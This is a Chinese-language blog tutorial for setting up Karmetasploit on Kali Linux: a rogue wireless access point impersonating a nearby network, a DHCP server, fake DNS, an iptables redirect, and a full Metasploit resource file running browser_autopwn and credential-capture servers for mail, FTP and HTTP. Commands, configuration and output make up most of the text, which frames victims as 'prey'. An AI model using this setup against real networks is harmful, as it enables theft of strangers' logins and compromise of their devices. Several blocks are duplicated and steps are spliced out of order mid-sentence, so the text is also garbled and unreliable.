Karmetasploit 用偽造的無線 AP (Access Point),讓 client 的無線通訊經由此 AP,而讓攻擊機可以分析或注入漏洞到client的應用系統,以達到滲透的目的,然而不是所有的無線網卡都可以偽造 AP,你的網卡必須要能支援 monitor 及 Injection 模示,可以參考
Aircrack-NG Compatibility Page所列的清單。
Aircrack-NG Compatibility Page所列的清單。
Kali 裡事先已經安裝 airmon-ng 套件及 Karmetasploit,不過我們還要完成相關設定才能實戰,執行步驟如下述:
1. 要完成 Karmetasploit的偽造,需要有 dhcp service 的支援,可用 service --status-all 查看是否已執行 dhcpd,如果沒有,請先安裝及設定 dhcpd 服務:
3. 執行 airmon-ng start [WIFI-INTERFACE]
經測試無線網卡在 monitor 及 Injection 皆可正常作業,接著就要設置karmetasploit環境。
5. 開一個Console視窗 1,並執行(執行完不要關閉 Console):
6. 接著開Console視窗2,並依序執行下列命令:
7.準備 metasploit 使用的 resource 檔(karma.rc,可以自行複製下面的內容至文字檔中,或由網路下載),我們把 karma.rc 存在 /etc 目錄下
9. 等待獵物上門囉! (如何剖析抓到的資料,下回分解)
(1) 安裝 apt-get install isc-dhcp-server
(2) 架構 dhcpd.conf 內容:在 /etc 目錄下建一個 dhcpd.conf 檔案,並參考 /etc/dhcp/dhcpd.conf 或者 /etc/dhcp3/dhcpd.conf 的內容,再將下面內容組合至/etc/dhcpd.conf 裡:
(3)啟動 service isc-dhcp-server start
2. 執行 airodump-ng-oui-update (Option)更新 airCarck到最新版(2) 架構 dhcpd.conf 內容:在 /etc 目錄下建一個 dhcpd.conf 檔案,並參考 /etc/dhcp/dhcpd.conf 或者 /etc/dhcp3/dhcpd.conf 的內容,再將下面內容組合至/etc/dhcpd.conf 裡:
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
(3)啟動 service isc-dhcp-server start
3. 執行 airmon-ng start [WIFI-INTERFACE]
啟用你的無線網卡到monitor模式,[WIFI-INTERFACE] 是你無線網卡代號,像我的是 wlan0,如果執行成功,會建立一組 monitor 介面,並命名為 mon0
4. 執行 aireplay-ng --test [MONITOR-INTERFACE]
測試 monitor 介面支援 Injection 功能,[MONITOR-INTERFACE] 就是前一步驟建立的 mon0,如果執行成功,請仔細找出哪些正常的AP是可以拿來攻擊的。
root@kali104:/# aireplay-ng --test mon0
02:19:20 Trying broadcast probe requests...
02:19:20 Injection is working!
02:19:22 Found 2 APs
02:19:22 Trying directed probe requests...
02:19:22 00:xx:01:xx:78:xx - channel: 11 - 'buffaloap'
02:19:22 Ping (min/avg/max): 1.759ms/12.232ms/65.397ms Power: 7.36
02:19:22 28/30: 93%
02:19:22 06:xx:B3:xx:02:xx - channel: 11 - 'linksys'
02:19:23 Ping (min/avg/max): 3.184ms/3.682ms/6.579ms Power: -128.00
02:19:23 30/30: 100%
從上面訊息,可以看到「buffaloap」和「linksys」都可以被注入,所以都可以對其進行攻擊!底下就拿 linksys 做為測試目標02:19:20 Trying broadcast probe requests...
02:19:20 Injection is working!
02:19:22 Found 2 APs
02:19:22 Trying directed probe requests...
02:19:22 00:xx:01:xx:78:xx - channel: 11 - 'buffaloap'
02:19:22 Ping (min/avg/max): 1.759ms/12.232ms/65.397ms Power: 7.36
02:19:22 28/30: 93%
02:19:22 06:xx:B3:xx:02:xx - channel: 11 - 'linksys'
02:19:23 Ping (min/avg/max): 3.184ms/3.682ms/6.579ms Power: -128.00
02:19:23 30/30: 100%
經測試無線網卡在 monitor 及 Injection 皆可正常作業,接著就要設置karmetasploit環境。
5. 開一個Console視窗 1,並執行(執行完不要關閉 Console):
root@kali104:/# airbase-ng -P -C 30 -e "linksys" -v mon0
上面命令的 linksys 是我們要偽造的目標, mon0 是我們網卡開成monitor 模式的代碼,執行成功之後,請注意顯示訊息的第一行:Created tap interface at0,這個 at0 就是用來服務受害 Client 端的網路。
root@kali104:/# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali104:/# dhcpd -cf /etc/dhcpd.conf at0
root@kali104:/# dhcpd -cf /etc/dhcpd.conf at0
# load db_sqlite3 # 因為 metasploit 已內建 postgresql,所以此行可免
# db_create /root/karma.db # 使用 msfconsole 的 msf3 資料庫即可
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
8. 啟動 Karmetasploit# db_create /root/karma.db # 使用 msfconsole 的 msf3 資料庫即可
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
root@kali104:/# msfconsole -r /etc/karma.rc
或者進入 msconsole 後,使用 resource karma.rc 載入亦可為了方便參考,我把上面的步驟縮簡如下,console1, console2 就是要開啟的兩個Console 台
| console 1 | console 2 |
# airmon-ng start wlan0
'啟用監聽的網卡 # aireplay-ng --test mon0 '查看哪些AP可以注入 # airbase-ng -P -C 30 -e "linksys" -v mon0 '開始注入/監聽 ...從這裡開始有訊號進來(不要關閉 conslole),注意第一行,會出現「Created tap interface at0」!!! |
# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
'啟動 at0 介面卡 # dhcpd -cf /etc/dhcpd.conf at0 '讓 at0 具備 dhcp server 功能 # msfconsole -r /etc/karma.rc '進入 metasploit ...進入msfconsole 後,就靜靜等候,如果metasploit滲透成功,就會跳出 complete 訊息,就可以做進一步操作!!! |
PS: 通常 client 剛加到 Karmetasploit router 時,可能還存在之前的 DNS 快取,而直接利用此暫存結果連線到之前的目標 IP,不會轉向 Metasploit 的 DNS 模組來查詢, 為了能解決 client 逃過我們的 DNS 陷阱的問題,可以透過修改 iptable 的方式,將所有流向此 AP 的封包都轉向這個系統中。
root@kali104:/# iptables -t nat -A PREROUTING -i at0 -j REDIRECT
沒有留言:
張貼留言